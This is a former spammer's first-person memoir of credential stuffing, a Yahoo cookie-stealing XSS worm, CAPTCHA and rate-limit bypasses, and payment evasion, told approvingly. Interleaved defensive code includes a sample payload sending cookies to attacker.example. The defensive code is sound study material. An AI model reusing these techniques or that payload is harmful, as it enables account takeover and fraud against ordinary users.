Spam Operation: Twitter & Pinterest

Social network spam was the root of my spamming career. It started with MySpace, and as other social networks became popular, they became targets. With a plethora of data at my disposal, it wasn’t difficult to turn the data into dollars. The same concept as my infamous “contact mail” was used on these social networks: create software that would check whether the same email/password credentials worked on these sites and then spam their friends, wall, board, etc. Now, the success rate of these logins was much lower than for e-mail, some even as low as 2 to 4%, but when you have hundreds of millions of records, the percentage is merely a statistic. Without any login rate limiting or other security on these sites, I could easily check a few million accounts in just a few hours. Of course I had 20,000+ proxies at all times to use, but that was only a precaution to keep them guessing.

This would eventually lead to tens of millions of accounts being spammed throughout 2013-2014. I was promoting whatever Dr. Oz was endorsing that month, everything from garcinia cambogia to green coffee beans and raspberry ketones. Any time I wanted to make a few thousand dollars I could just run 100k accounts in a matter of minutes.

Here are a few articles guessing what was going on with these social networks:

Hacking Yahoo with XSS

The first time I remember reading about XSS was when the Samy worm was created on MySpace in 2005. In fact, I had actually used different XSS techniques to bypass MySpace’s filters during my operation.

Anyways, the first time I saw a Yahoo XSS was on another spammer’s landing page that was promoting a work from home program. My friend owned the program he was pushing and wanted me to check out his landing page and see how he was making $5,000/day. After investigating it for a few minutes, I saw that there was a bit of code loading from the domain yahoo.com. This was unusual, because there wasn’t any reason for any assets from yahoo.com to be loading. I captured the headers and saw that it linked back to hk.groups.yahoo.com or something similar. There was a forum on the page that was vulnerable to a persistent XSS attack. He was stealing Yahoo users’ session cookies and mailing with them.


After understanding the intricacies of this operation I wasn’t too surprised that he was clearing $5,000/day. Within the hour, I found the injection point and had injected my own code into the vulnerable Yahoo forum. Now, when you steal a user’s session cookie it means that you don’t need their login credentials: no email, no password, nothing. You are already logged into their account by having their cookie. The worm was fairly simple: grab the user’s cookie, hit mail.yahoo.com, and send mail to everyone in their address book. Once users read the email and visited the website that was sent in it, it would grab their cookie and go through the process all over again. Yahoo killed the website that was vulnerable in just a couple of days, but not before I had made close to $30,000.

For me, hacking and spamming is a high that can’t be replicated. Over the next year, I would go on to find more XSS exploits, once again playing cat and mouse with Yahoo’s security team. The most infamous XSS exploit that I found was on the Yahoo developer’s blog. It was a publicly known exploit, but for me it was a chance to slap Yahoo in the face. Now I didn’t necessarily have a grudge against Yahoo, but at the time they were offering security researchers a $12.50 voucher to their store for these same exploits that put every user on Yahoo at risk.

On this particular XSS vulnerability and worm, I hacked over 5 million accounts and sent over 25 million emails in a 3 day period. At the peak of this worm I was making $1,000 every 10 minutes. I was promoting a work from home program that paid $100 per sign up and I accumulated over 2,500 sales; do the math on that one. This caused havoc for Yahoo and eventually led them to change the way they stored cookies.
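The two things that made the worm above work were a forum that echoed posted text straight back into the page, and a session cookie that page script could read. The following is an added example, not code from the original post or from Yahoo: it shows the vulnerable rendering pattern next to its hardened form, and the cookie attributes that keep a session token out of `document.cookie` even when an injection does land. The collection host `attacker.example` in the constructed payload is a placeholder, and `looks_executable` is a demonstration heuristic only, not a sanitizer.

```python
import secrets
from html import escape

# Constructed payload of the kind a stored-XSS cookie-stealing worm would post to a
# forum. attacker.example is a placeholder, not a real collection endpoint.
PAYLOAD = "<script>new Image().src='http://attacker.example/c?'+document.cookie</script>"


def render_post_unsafe(author: str, body: str) -> str:
    """Vulnerable pattern: user-controlled text concatenated straight into HTML.
    Whatever the poster wrote, <script> included, is served to every later visitor."""
    return f'<div class="post"><b>{author}</b>: {body}</div>'


def render_post_safe(author: str, body: str) -> str:
    """Hardened form: HTML-encode on output. quote=True also encodes " and ', so the
    same helper is safe when the value lands inside an attribute."""
    return (f'<div class="post"><b>{escape(author, quote=True)}</b>: '
            f'{escape(body, quote=True)}</div>')


def new_session_id() -> str:
    """Unguessable session token; the cookie value is never derived from the login."""
    return secrets.token_urlsafe(32)


def session_cookie_header(session_id: str, secure: bool = True) -> str:
    """Set-Cookie line for the session token. HttpOnly keeps it out of document.cookie,
    so even a script that does run in the page cannot read it; Secure stops it going
    over plain HTTP and SameSite=Lax blocks most cross-site replay."""
    attrs = ["Path=/", "HttpOnly", "SameSite=Lax"]
    if secure:
        attrs.append("Secure")
    return f"Set-Cookie: sid={session_id}; " + "; ".join(attrs)


def looks_executable(html_fragment: str) -> bool:
    """Heuristic used only to show the difference between the two renderers;
    it is not a sanitizer and must not be used as one."""
    lowered = html_fragment.lower()
    return any(marker in lowered for marker in ("<script", "onerror=", "javascript:"))


if __name__ == "__main__":
    print(render_post_unsafe("guest", PAYLOAD))
    print(render_post_safe("guest", PAYLOAD))
    print(session_cookie_header(new_session_id()))
```

Output encoding fixes the injection; HttpOnly limits the damage when encoding is missed somewhere, which is the cookie-storage change the paragraph above refers to. Neither one replaces the other.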

Here are a couple of articles detailing the exploits:

The Battles Fought with Microsoft and Yahoo

A lot of people will assume that everything I did was because of the money. The truth is hacking and spamming was my greatest passion in life. The money was just a bonus and a measurement of my success. The battles I fought with Yahoo’s and Microsoft’s security teams were some of the most fun and greatest moments of my life. Now, I might have given the impression that you can just create automated software, load some data, type a command, and become a successful spammer. It may have been like that in the very beginning, but if you thought Microsoft and Yahoo were going to just sit around and continue to allow me to have my way, you’re wrong.

The entire contact mail operation was a cat and mouse game. Microsoft and Yahoo would implement a security feature and I would figure out a way to beat it. For years, I was using the basic webmail protocol to log in and fetch the user’s address book; to send mail I would use good old port 25, better known as SMTP. The first security feature they implemented was CAPTCHA. CAPTCHA could be solved with OCR, or optical character recognition, software. There were brilliant programmers out there who created and rented software that could actually read the distorted characters with a 60%+ success rate. There were also services out there to solve CAPTCHAs for you at a rate of $2 per 1,000 CAPTCHAs. I didn’t like either of these options.

Reverse engineering is probably one of my greatest strengths. It can be traced all the way back to my first operation on MySpace in 2007. I simply ask myself questions like: “How does this work?”, “How can I make this computer believe that I’m a human user?”. In this case, the question was how I could trick Hotmail into not showing me that CAPTCHA. The answer was literally in my hand: it was my phone. The developers had overlooked implementing CAPTCHA on their mobile website. It was as simple as changing hotmail.com to m.hotmail.com. This allowed me to completely bypass CAPTCHA.


It wasn’t long before Microsoft caught on and realized the mistake they had made. Within a few months they implemented CAPTCHA on their mobile website and even started locking the accounts. Now here’s the thing: I only needed to log in to the Hotmail website to pull the list of contacts in the address book. With Microsoft getting smarter, it was time to look at other options. I don’t remember exactly what sparked the idea, but there were a handful of websites that would allow you to import your address book and invite your friends to the website. These special websites were whitelisted and wouldn’t require a CAPTCHA. In fact, they would use the website’s own IP address to log in to your account. There were several websites like this, but the one I remember most is MySpace.

After months of battling with Microsoft and Yahoo, they finally implemented SMS verification. SMS verification was implemented by locking you out of your account until you added a cell phone number. If there was a suspicious attempt to login to your account, they would send a code to your phone and you would have to enter it to log in to your account. This would prevent guys like me from logging into your account unauthorized, or so they thought.


Like I said, it was a game of cat and mouse. Mobile applications were on the rise and these email providers didn’t miss the opportunity to join the game. Hotmail and Yahoo alike created their own email applications for Android and iPhone. This was new territory for the both of us. The thing about technology is it’s always ahead of security.

When I downloaded the apps, I found that you could log in to any account without any kind of security. These mobile applications used entirely different servers and had zero security implemented. In other words, they were wide open. I mean there wasn’t even a standard per-IP request rate limit. This was a game changer and allowed me to continue my operation for quite some time. Not only did it prolong my contact mail operation, it opened my eyes to reverse engineering other applications in the future.

The Evolution of Contact Mail

While the Twitter operation was a success, I still wanted to go back to the quieter side of my contact mailing. The only problem was that the accounts I was mailing with were producing fewer and fewer results. If I wanted to produce the numbers I was used to seeing, I would have to expand my operation to other email providers.

So in 2012, I did a domain extension count on my databases. This would tell me how many accounts I had for each email provider and, more importantly, which providers were the most popular. The top three were obviously Hotmail, Yahoo, and Gmail. At the time, I was nearly 2 years into my Hotmail and Yahoo operation. Now, I didn’t want to go up against Google, as I knew their security precautions with reCAPTCHA would be a huge headache. I was more interested in the lesser known providers. This left me with four options: AOL, Road Runner, Cox, and Earthlink. There were a couple of things about these options that I loved. First, they were all US based, which meant that all of the traffic generated from these accounts and, more importantly, their contacts would be from the US. Secondly, nobody had ever thought about contact mailing these providers. It was as fresh as the very first contact mail operation on Hotmail.

So which one did I choose to do? All of them.

Twitter v1.0

In the spam game, staying current with the trends is just as important as in any other marketing job. I’ve always had an eye for trends and for predicting the next big social media website. By 2011 Twitter had grown to over 250 million members and had no plan of slowing down. This made Twitter a prime candidate for my next spam operation. Back then there was no security; I don’t even think they had a security team, to be honest.

The operation would be fairly simple and would have the same concept as most of my operations: take the email and password combinations from the databases I owned and check whether they used the same password on Twitter. I was amazed not only at how many worked, but at how many people actually had a Twitter account. The thing is, if you had a Twitter account you probably used the same password you signed up to any other site with. The raw number was about 10% (that’s without excluding addresses that weren’t even registered on Twitter). At the time that was somewhere in the neighborhood of 3 million valid Twitter accounts.

The second function of the software would DM the account’s followers and send out a tweet. The first campaign I ran was a bizop offer. Bizop was my go-to because it appealed to everyone and yielded the highest return. I mean, who doesn’t want to make money from home?

While the campaign was a success, netting thousands of dollars a day, the risk didn’t seem worth it. What I mean is there were hundreds of websites asking “Did Twitter get hacked?” and “Help! My Twitter account has been hacked”. Not only that, journalists and bloggers alike were writing about the havoc I was causing on Twitter.


For now, the operation was on the back burner and I would revert back to the more quiet operations.

The Expansion of Contact Mail

In a previous post, I described how Hotmail and its users were the first to experience the effects of contact mail. When accounts on Hotmail started producing less and less money, it was time to explore other email providers. In 2011, Yahoo would be the next email provider to experience contact mail. Now, Yahoo was different: they actually had some security measures which would prevent me from abusing them the same way I had been able to on Hotmail.

One of the most notable security features they had implemented was IP address rate limiting. This meant I wasn’t able to mass verify login credentials from my databases without being banned from Yahoo. It was a problem, but a fairly easy one to solve. All I needed was a massive pool of IP addresses. Luckily for me, because of some of the communities I was in, I knew where to purchase this type of service. For $400 a week, I could rent 10,000 online botnet proxies. This would be more than enough to bypass any rate limiting Yahoo had implemented.

And just like that I had restored my contact mail operation to its full glory.

Singlesnet.com – Hacked.

There were never any reports made by the media or even a response from Singlesnet. Now I’m not sure exactly when it was hacked, but I came into possession of this database from a trade I did with a friend. The date on the file was 2011, so I’m assuming it was hacked not long after eHarmony. In fact, this database was just as glorious as eHarmony. It contained 16 million records of emails and plaintext passwords. I treated this database the same way I did eHarmony. The contact mail operation was back in full force. I actually found the farticle (fake news article) I used to promote the work from home programs.


The Birth of Contact Mail

After receiving the eHarmony database, I had to do some serious brainstorming on how I could maximize the profits with this data. I knew that the people who already had the database would be sending all kinds of dating offers to the e-mail addresses. I also knew that I would be able to mail to the same list, but I didn’t want to compete with the other guys. I had to think outside of the box, so I thought back to my very first MySpace operation nearly three years ago and came up with the brilliant idea to e-mail the contacts in the address book. Little did I know how much this method would change the spam game forever.

The software I had created would attempt to log in to hotmail.com and check whether the user used the same password as they did on eHarmony. You have to remember this was back in 2010 and people weren’t as educated about security as they are today. So after running the accounts through the software, about 25% of the people had used the same password. When it was finally done I had around 1 million valid Hotmail accounts that I could mail with.
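The password-reuse check described here, and in the earlier passages on Twitter, the social networks and the Yahoo rate limiting that a rented pool of 10,000 proxies got around, is what defenders now call credential stuffing. The following is an added example, not code from the original post or from any provider: it runs two detection signals over a constructed login log. The per-IP signal (one address trying many distinct accounts, almost all failing) catches a small proxy pool; the one-shot-failure signal (the share of accounts whose only attempt in the window failed) does not depend on the source address at all, so it still fires when the attempts are spread across a large pool. The log format, addresses and thresholds are all assumptions for the demonstration.

```python
import re
from collections import defaultdict

# Constructed log format for this example (not a real provider's format):
#   <timestamp> ip=<addr> user=<account> result=ok|fail
LOG_RE = re.compile(r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>ok|fail)$")


def build_sample_log(proxies: int = 4) -> str:
    """Constructed sample: five real users logging in from their own addresses, then 40
    leaked email/password pairs each tried once through `proxies` different source IPs,
    with one of the 40 reused passwords working (roughly the 2-4% rate the post describes)."""
    lines = []
    for i in range(5):
        for j in range(3):
            result = "fail" if (i == 2 and j == 0) else "ok"   # one user mistypes once, then retries
            lines.append(f"2011-06-01T10:{i:02d}:{j:02d}Z ip=198.51.100.{i + 1} "
                         f"user=u{i}@example.com result={result}")
    for k in range(40):
        result = "ok" if k == 7 else "fail"
        lines.append(f"2011-06-01T11:00:{k:02d}Z ip=203.0.113.{k % proxies + 1} "
                     f"user=victim{k}@example.com result={result}")
    return "\n".join(lines)


def parse(log_text: str) -> list:
    """Parse log lines into dicts; malformed lines are skipped rather than crashing the job."""
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def flag_stuffing_ips(events, min_users: int = 5, max_success: float = 0.2) -> list:
    """Per-source-IP signal: one address trying many distinct accounts with a low success
    rate. Effective against a small proxy pool, blind to a large one where each IP makes
    only a handful of attempts."""
    stats = defaultdict(lambda: {"attempts": 0, "ok": 0, "users": set()})
    for e in events:
        s = stats[e["ip"]]
        s["attempts"] += 1
        s["ok"] += e["result"] == "ok"
        s["users"].add(e["user"])
    return sorted(ip for ip, s in stats.items()
                  if len(s["users"]) >= min_users and s["ok"] / s["attempts"] <= max_success)


def one_shot_failure_ratio(events) -> float:
    """Source-independent signal: share of accounts whose only login attempt in the window
    failed. Leaked credentials get tried once each while real users retry after a typo, so
    the ratio stays high however many proxies the attempts are spread over."""
    per_user = defaultdict(lambda: {"attempts": 0, "ok": 0})
    for e in events:
        per_user[e["user"]]["attempts"] += 1
        per_user[e["user"]]["ok"] += e["result"] == "ok"
    if not per_user:
        return 0.0
    one_shot_fails = sum(1 for s in per_user.values() if s["attempts"] == 1 and s["ok"] == 0)
    return one_shot_fails / len(per_user)


if __name__ == "__main__":
    for n in (4, 40):
        ev = parse(build_sample_log(proxies=n))
        print(f"{n} proxies: flagged ips={flag_stuffing_ips(ev)} "
              f"one-shot failure ratio={one_shot_failure_ratio(ev):.2f}")
```

With four proxies every proxy address is flagged; with forty, none is, yet the one-shot failure ratio is unchanged at 39 of 45 accounts. In practice the ratio would be compared against a baseline for the same window on normal days, and the response is to step up verification for the affected accounts rather than to block addresses.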

I had just moved from Florida to downtown Los Angeles with a girl I met online, paying $3,800/mo for a condo that I probably couldn’t afford. In fact, at the time, I only had a couple hundred dollars to my name. Hurting for cash and Christmas being right around the corner, this operation had to work.


With little to no start-up cash, I had to bootstrap and think outside of the box once again. I remembered back to my first mailing operation, where I used a service that rented cloud servers and allowed you to pay as you go. It was easy to trick the payment processing by using a prepaid gift card, as they would only check your card for $1 and bill you at the end of the billing cycle. It cost me $20 for a prepaid TracFone, which was used to verify my account on the cloud service. That was their security precaution after my previous endeavors with their service.

I created 15 servers, which meant that I was able to place my mailing software on each one. This meant that I had the power of 15 mailers. At approximately 100 mails per second across 15 servers, I was sending nearly 100,000 e-mails a minute. I didn’t realize exactly how fast this was, but I was soon going to find out. At the time I was promoting a bizop offer, which is basically a make money from home program. It was a program that would pay me around $40 per sign up. At the peak hours of the day I was making something like $10,000 an hour. The adrenaline rush, excitement, and anxiety that this caused was unmatched by any drug I had ever tried. Over the weekend, I had accumulated something like 8,000 sign ups. That’s right, over 15,000,000 e-mails sent and $300,000 in revenue generated from a free database, a $20 TracFone, and a $10 gift card.


This was the first time that the internet was introduced to “contact mail”. It was also the first time that the advertiser (the person who owned the program) experienced this type of traffic. The advertiser was irate once he found out how the sales were generated and called it all fraud. In a sense I did agree it was deceptive, but what couldn’t be disputed was the fact that there was a ton of money generated and sitting in his bank accounts. We ended up settling on an agreement of $100,000 and parted ways. I was 21 years old and this was definitely the most money I had ever seen. It was a moment in my life where I knew I had discovered something great and would be set financially for a very long time.

My First E-mail Spam Operation

I knew a guy that did white hat mailing for a living, so I decided to consult him. Now he was from the AOL scene too and you could say that there was a certain level of camaraderie between people from that scene. We came to an agreement that he would provide e-mail data for a revenue share.

I decided to use the Hotmail accounts from the Hi5.com database to mail from; after all, 25% or more of the people used the same passwords for everything. I partnered with a programmer to create software that would verify which accounts used the same password on Hotmail, and additional software that would mail with those accounts.

I did it, I was in business, I was officially an e-mail spammer. I remember it like it was Christmas, because it actually was a day before Christmas 2009. I made something to the tune of $17,000 the first month of e-mail spamming, or so I thought. My programmer and partner at the time actually took the majority of the money and took off to the Dominican Republic for an extended vacation.

Things in my life got pretty rough after that, mostly because of drug abuse. I ended up moving to Kissimmee, Florida. It was a chance to get a fresh start with 2 other guys from the AOL scene that started an affiliate marketing company. It was a win-win situation for all of us, I could focus on mastering my craft, and I would in return help the company grow by promoting their offers.

Upon arrival, I couldn’t help but to feel like Will Smith in the Fresh Prince of Bel-Air. I grew up in a small town, in a small house outside of Little Rock. This house was 4,400 square feet and came equipped with a movie theater, pool, and jacuzzi. Although it wasn’t necessarily a mansion, we still deemed it the “Spamansion”.


Every day for 5 months, we got up at 5 A.M. to launch our campaigns, cook breakfast, and spark a blunt to get the day started. I was promoting everything from dating websites to credit report offers, making anywhere from $300 to $1,000 a day. It was the beginning of me realizing my potential and what I could actually achieve if I worked hard and stayed focused. We celebrated daily and frequently invited other internet marketers to come visit and party with us. I was 20 years old at the time and I’ll always remember this as one of the greatest summers of my life.

Meetup.com and the Year of the Flog

At the end of 2008 and the beginning of 2009, I started exploring more into affiliate marketing. I discovered that there were far more offers to promote that would yield a higher return. Weight loss was a hot niche and people were making a ton of money by selling nutraceutical products. I wanted in.

Now, affiliate marketing is a copycat industry. Everyone copies each other in one capacity or another, and the most commonly copied thing is landing pages. I don’t remember where I copied mine from, but I did find the very first landing page I used back in 2008-2009 thanks to the Wayback Machine. It was titled “Maria’s Weight Loss Blog“.


Spamming on MeetUp was my first endeavor in promoting weight loss products. I was new to the niche, but I was excited to take on the new challenge. Meetup.com was a fast growing social website that allowed people to create groups and meet others with the same interests/hobbies. This was a great potential target for me, because I could infiltrate these groups as a new member without being introduced by an existing member. There was also an e-mail address assigned to each group that would distribute an e-mail to everyone in the group. So if there were 5,000 members in a group, all I would have to do is send 1 e-mail. It was essentially the key to the castle.

In my previous spamming operation on MyYearBook, I learned the process of scraping data. That technique would play a huge part in the success of this campaign. I needed to scrape every group and even join each group with an account to grab the otherwise hidden e-mail address. To achieve this I needed multiple accounts and, even more frustratingly, I had to activate each account by clicking a link in an e-mail. I used a trick that’s still around today: I used one throwaway Gmail account and varied it by putting periods at random positions in the address, since Gmail ignores dots in the local part and delivers every variation to the same inbox. This allowed me to register many accounts against one mailbox and automate the activation step using IMAP.
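The dot trick works because Gmail ignores dots in the local part of an address, so `m.aria@gmail.com`, `ma.ria@gmail.com` and so on all reach one mailbox. The following is an added example, not code from the original post or from Meetup: it enumerates those variations for a local part, and, on the defender's side, canonicalizes addresses into a dedupe key so that a signup flow can count how many distinct mailboxes a batch of registrations actually reaches. The domain list and the decision to lowercase the local part are assumptions for the example; the canonical form is a comparison key only and must never replace the address mail is sent to.

```python
# Domains known to ignore dots and "+suffix" in the local part (assumption for this example).
GMAIL_DOMAINS = {"gmail.com", "googlemail.com"}


def dot_variants(local: str) -> list:
    """All 2**(n-1) ways to place dots between the characters of a local part.
    Gmail delivers every one of them to the same mailbox. Returns the undotted
    original as the first entry."""
    if len(local) < 2:
        return [local]
    gaps = len(local) - 1
    variants = []
    for mask in range(1 << gaps):          # bit i set => a dot after character i
        chars = [local[0]]
        for i in range(gaps):
            if mask >> i & 1:
                chars.append(".")
            chars.append(local[i + 1])
        variants.append("".join(chars))
    return variants


def canonicalize(address: str) -> str:
    """Dedupe key for an e-mail address. For the Gmail domains, dots in the local part
    and any +suffix are dropped and googlemail.com is folded into gmail.com. For every
    other domain the local part is left alone apart from case: RFC 5321 says dots there
    are significant, so stripping them would merge genuinely different mailboxes.
    Lowercasing the local part is a pragmatic choice, not something the RFC guarantees."""
    local, sep, domain = address.rpartition("@")
    if not sep or not local or not domain:
        raise ValueError(f"not an e-mail address: {address!r}")
    local, domain = local.lower(), domain.lower()
    if domain in GMAIL_DOMAINS:
        local = local.split("+", 1)[0].replace(".", "")
        domain = "gmail.com"
    return f"{local}@{domain}"


def count_distinct_inboxes(addresses) -> int:
    """How many real mailboxes a list of signup addresses actually reaches."""
    return len({canonicalize(a) for a in addresses})


if __name__ == "__main__":
    signups = [f"{v}@gmail.com" for v in dot_variants("maria")]   # constructed batch
    print(len(signups), "signups reach", count_distinct_inboxes(signups), "mailbox(es)")
```

A five-character local part already yields 16 addresses, and a ten-character one 512, which is why one throwaway inbox is enough to activate a large batch of accounts. Rate limiting registrations per canonical key, rather than per literal address, closes that gap without touching the address the activation mail is sent to.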

When it was said and done I had successfully captured the e-mail address assigned to 70,000+ groups on MeetUp. I guess this would be considered my first e-mail campaign, even though it wasn’t a traditional e-mail campaign. Everyone got an e-mail about Maria’s weight loss success and a huge percentage bought the products “she” used.

The next day MeetUp addressed it and released a blog post detailing how to disable the e-mail feature for a group. It has since been taken down, but it was very fascinating to get a response to my operation.